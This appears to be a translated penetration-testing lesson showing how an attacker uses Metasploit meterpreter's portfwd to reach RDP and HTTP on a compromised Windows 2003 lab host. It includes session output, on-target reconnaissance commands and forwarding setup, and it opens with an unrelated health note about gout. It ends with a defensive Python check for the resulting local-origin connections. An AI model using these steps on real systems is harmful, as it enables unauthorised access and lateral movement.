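Note: drink plenty of hot or cooled boiled water; it helps prevent kidney stones, gout and similar conditions.
    Gout can be accompanied by obesity, hypertension, diabetes, dyslipidemia and other metabolic diseases.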

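    portfwd is a powerful port-forwarding tool. It supports TCP and UDP, and can translate between IPv4 and IPv6 while forwarding. It is also built into meterpreter. The source code of the standalone exe version is here: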

    https://github.com/rssnsj/portfwd

    Attacker machine:
    192.168.1.5 Debian

    Target machines:
    192.168.1.4 Windows 7
    192.168.1.119 Windows 2003

        msf exploit(multi/handler) > sessions -l
        Active sessions
        ===============
        Id  Name  Type                     Information                        Connection
        --  ----  ----                     -----------                        ----------
        1         meterpreter x86/windows  WIN03X64\Administrator @ WIN03X64  192.168.1.5:45303 -> 192.168.1.119:53 (192.168.1.119)
        msf exploit(multi/handler) > sessions -i 1 -c 'ipconfig'
        [*] Running 'ipconfig' on meterpreter session 1 (192.168.1.119)
        Windows IP Configuration
        Ethernet adapter 本地连接:
        Connection-specific DNS Suffix . :
        IP Address. . . . . . . . . . . . : 192.168.1.119
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1

    Lesson 95: Port forwarding with Portfwd - Figure 1

    Target IP:
    192.168.1.119 - Windows 2003 - x64

    Ports to forward: 80, 3389

        msf exploit(multi/handler) > sessions -i 1
        [*] Starting interaction with 1...
        meterpreter > shell
        Process 4012 created.
        Channel 56 created.
        Microsoft Windows [版本 5.2.3790]
        (C) 版权所有 1985-2003 Microsoft Corp.
        C:\Documents and Settings\Administrator\桌面>if defined PSModulePath (echo ok!) else (echo sorry!)
        if defined PSModulePath (echo ok!) else (echo sorry!)
        sorry!
        C:\Documents and Settings\Administrator\桌面>net config Workstation
        net config Workstation
        计算机名 \\WIN03X64
        计算机全名 win03x64
        用户名 Administrator
        工作站正运行于
        NetbiosSmb (000000000000)
        NetBT_Tcpip_{37C12280-A19D-4D1A-9365-6CBF2CAE5B07} (000C2985D67D)
        软件版本 Microsoft Windows Server 2003
        工作站域 WORKGROUP
        登录域 WIN03X64
        COM 打开超时 (秒) 0
        COM 发送计数 (字节) 16
        COM 发送超时 (毫秒) 250
        命令成功完成。
        C:\Documents and Settings\Administrator\桌面>netstat -an|findstr "LISTENING"
        netstat -an|findstr "LISTENING"
        TCP    0.0.0.0:80           0.0.0.0:0    LISTENING
        TCP    0.0.0.0:135          0.0.0.0:0    LISTENING
        TCP    0.0.0.0:445          0.0.0.0:0    LISTENING
        TCP    0.0.0.0:1025         0.0.0.0:0    LISTENING
        TCP    0.0.0.0:1026         0.0.0.0:0    LISTENING
        TCP    0.0.0.0:3078         0.0.0.0:0    LISTENING
        TCP    0.0.0.0:3389         0.0.0.0:0    LISTENING
        TCP    0.0.0.0:9001         0.0.0.0:0    LISTENING
        TCP    127.0.0.1:2995       0.0.0.0:0    LISTENING
        TCP    127.0.0.1:9000       0.0.0.0:0    LISTENING
        TCP    127.0.0.1:9999       0.0.0.0:0    LISTENING
        TCP    192.168.1.119:139    0.0.0.0:0    LISTENING

    Lesson 95: Port forwarding with Portfwd - Figure 2

        meterpreter > portfwd -h
        Usage: portfwd [-h] [add | delete | list | flush] [args]
        OPTIONS:
        -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
        -R        Indicates a reverse port forward.
        -h        Help banner.
        -i <opt>  Index of the port forward entry to interact with (see the "list" command).
        -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
        -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
        -r <opt>  Forward: remote host to connect to.

    Lesson 95: Port forwarding with Portfwd - Figure 3

    Run on the attacker machine:

        meterpreter > portfwd add -l 33389 -r 192.168.1.119 -p 3389
        [*] Local TCP relay created: :33389 <-> 192.168.1.119:3389
        meterpreter > portfwd add -l 30080 -r 192.168.1.119 -p 80
        [*] Local TCP relay created: :30080 <-> 192.168.1.119:80
        meterpreter > portfwd
        Active Port Forwards
        ====================
        Index  Local          Remote              Direction
        -----  -----          ------              ---------
        1      0.0.0.0:33389  192.168.1.119:3389  Forward
        2      0.0.0.0:30080  192.168.1.119:80    Forward
        2 total active port forwards.

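    Lesson 95: Port forwarding with Portfwd - Figure 4

    Lesson 95: Port forwarding with Portfwd - Figure 5

    Check the LISTEN ports on the attacker machine: the forwarding has succeeded.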

        root@John:~# netstat -ntlp |grep :3
        tcp 0 0 0.0.0.0:33389 0.0.0.0:* LISTEN 2319/ruby
        tcp 0 0 0.0.0.0:30080 0.0.0.0:* LISTEN 2319/ruby

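    Lesson 95: Port forwarding with Portfwd - Figure 6

    From Windows 7, connecting to ports 33389 and 30080 on the attacker machine is equivalent to connecting to ports 3389 and 80 on the target.

    Lesson 95: Port forwarding with Portfwd - Figure 7

    Lesson 95: Port forwarding with Portfwd - Figure 8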

    Micropoor
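
A defender-side check for the forward set up above, added here as an example (not code from the original lesson or from Metasploit): the relay is created with `-r 192.168.1.119` through a session running on 192.168.1.119 itself, so the forwarded RDP and HTTP connections reach the service from the host's own address. The netstat sample is constructed, the function names are hypothetical, and the input is assumed to be Windows `netstat -an` text collected on the host being checked.

```python
import ipaddress

# Constructed sample: `netstat -an` on 192.168.1.119 while a forwarded RDP
# connection is open (addresses reuse the lab hosts from the lesson).
SAMPLE_NETSTAT = """\
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    192.168.1.119:53       192.168.1.5:45303      ESTABLISHED
  TCP    192.168.1.119:3389     192.168.1.119:1091     ESTABLISHED
  TCP    192.168.1.119:1091     192.168.1.119:3389     ESTABLISHED
  TCP    192.168.1.119:80       192.168.1.4:49222      ESTABLISHED
  TCP    127.0.0.1:9000         127.0.0.1:2996         ESTABLISHED
"""

WATCHED_PORTS = {80, 3389}  # the two services forwarded in the lesson


def split_endpoint(endpoint):
    """Split 'addr:port' (IPv4 or bracketed IPv6) into (ip_address, port)."""
    host, _, port = endpoint.rpartition(":")
    return ipaddress.ip_address(host.strip("[]")), int(port)


def find_self_connections(netstat_text, host_addrs, watched_ports=WATCHED_PORTS):
    """Return (peer_ip, peer_port, service_port) for ESTABLISHED connections
    to a watched service whose peer is this host (own address or loopback)."""
    own = {ipaddress.ip_address(a) for a in host_addrs}
    hits = []
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) != 4 or fields[0] != "TCP" or fields[3] != "ESTABLISHED":
            continue
        try:
            (l_ip, l_port), (r_ip, r_port) = map(split_endpoint, fields[1:3])
        except ValueError:
            continue  # not an addr:port pair, skip the line
        # Only the server side of the flow: local port is the watched service.
        if l_port in watched_ports and (r_ip in own or r_ip.is_loopback):
            hits.append((str(r_ip), r_port, l_port))
    return hits


if __name__ == "__main__":
    for peer, sport, service in find_self_connections(SAMPLE_NETSTAT, ["192.168.1.119"]):
        print(f"local-origin connection to port {service} from {peer}:{sport}")
```
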